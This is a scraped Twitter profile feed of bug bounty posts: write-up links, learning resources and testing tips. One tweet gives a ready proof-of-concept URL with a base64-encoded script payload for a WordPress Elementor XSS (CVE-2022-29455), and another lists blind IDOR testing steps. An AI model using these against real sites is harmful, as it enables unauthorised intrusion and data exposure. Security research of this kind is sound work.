@BugBountyHelp (@bugbountyhelp) 's Twitter Profile
@BugBountyHelp

@bugbountyhelp

#BugBountyHelp Hacking since 1949

ID: 1354072217324150786

calendar_today26-01-2021 14:22:42

363 Tweet

157 Followers

241 Following

Sivanesh Ashok (@sivaneshashok) 's Twitter Profile Photo

Published a writeup about how Sreeram KL and I, found a bug that let us steal Google OAuth token from Dropbox users. blog.stazot.com/stealing-googl…

Jonathan Bouman (@jonathanbouman) 's Twitter Profile Photo

📝Just published a blog about the data leak I found at LHV and NHG Nieuws; +15k 👨‍⚕️medical doctors usernames and hashed passwords leaked due to an unprotected API endpoint. The bug existed for 3 years, fixed within 48 hours.💡Read and learn more: medium.com/@jonathanbouma…

ʀᴇᴍᴏɴ (@remonsec) 's Twitter Profile Photo

I don't know if my opinion matters but #bugbounty really takes a lot of mental power. If you are someone who is planning to get started then please build up yourself mentally first. we really don't hope to see you feel lost around us 🤍

Luis Madero (@_y000_) 's Twitter Profile Photo

Wordpress - XSS ( CVE-2022-29455) /wp-content/plugins/elementor/assets/js/frontend.min.js poc: https://site/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg== #xss #wordpress

Wordpress - XSS ( CVE-2022-29455)

/wp-content/plugins/elementor/assets/js/frontend.min.js

poc:

https://site/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg==

#xss #wordpress
encodedguy - jsmon.sh (@3nc0d3dguy) 's Twitter Profile Photo

Hey everyone, I just posted a write-up on my recent bug on a Hackerone Challenge: "How I Pwned 10 Admin Panels and got rewarded 8000$+?" rashahacks.com/how-i-pwned-10… Don't forget to like and retweet it. #bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec

Harsh Bothra (@harshbothra_) 's Twitter Profile Photo

This year (2022), I have worked on creating educational resources in various forms, such as blogs, Twitter series, mindmaps and others. In case you missed them, here are all of them: # SecurityExplained Twitter Series: - github.com/harsh-bothra/S… 🧵 - 1/5

Harsh Bothra (@harshbothra_) 's Twitter Profile Photo

2/5 # MindMaps 1. Forget Password Vulns: xmind.net/m/nZwbdk/ 2. XML Attacks: xmind.net/m/xNEY9b/ 3. 2FA Bypass Techniques: xmind.net/m/8Hkymg/ 4. Android PT Checklist: xmind.net/m/GkgaYH/ 5. Cookie Based Auth Vulnerabilities: xmind.net/m/2FwJ7D/

Mike Takahashi (@taksec) 's Twitter Profile Photo

Blind IDOR 💥 1. Change userID 2. Get 200 status code, but no info leak 3. Check email, SMS, and export files 4. Email notification leaks PII Great write up by Vickie Li : vickieli.medium.com/how-to-find-mo… #idor #BAC #bugbountytips #bugbounty #hacking #infosec #cybersecuritytips

Blind IDOR 💥

1. Change userID
2. Get 200 status code, but no info leak
3. Check email, SMS, and export files
4. Email notification leaks PII

Great write up by <a href="/vickieli7/">Vickie Li</a> :
vickieli.medium.com/how-to-find-mo…

#idor #BAC #bugbountytips #bugbounty #hacking #infosec #cybersecuritytips
Bipin Jitiya (@win3zz) 's Twitter Profile Photo

If an unsafe logger is used, an attacker can inject code and execute arbitrary commands, even if the page being accessed is a 404 page. Always test HTTP request headers to make sure the application is handling the headers correctly. #Security #bugbountytips #Hacking #OOB_RCE

If an unsafe logger is used, an attacker can inject code and execute arbitrary commands, even if the page being accessed is a 404 page. 
Always test HTTP request headers to make sure the application is handling the headers correctly. 
#Security #bugbountytips #Hacking #OOB_RCE
Mr. Rc (@rcx86) 's Twitter Profile Photo

Are you interested in learning reverse engineering in 2023? I've spent the this year studying RE, and I want to share all the resources that helped me along the way in the following tweets. Trust me, you won't be disappointed! 🧵 #infosec

Are you interested in learning reverse engineering in 2023?
I've spent the this year studying RE, and I want to share all the resources that helped me along the way in the following tweets. Trust me, you won't be disappointed! 🧵

#infosec
sudi (@sudhanshur705) 's Twitter Profile Photo

I just published Exploring the World of ESI Injection Feedbacks are appreciated , let me know if you liked it or not :) Special thanks to nytr0gen link.medium.com/0WFFFk7n9vb

HACKLIDO (@hacklido) 's Twitter Profile Photo

💠 Bash for hackers | Learn the art of Bash Scripting 🔗 hacklido.com/blog/172-bash-… - - - # Tags - - - #Linux #bash #Hacking #CyberSec #cybersecuritytips #cybersecurity #infosec #infosecurity #sysadmin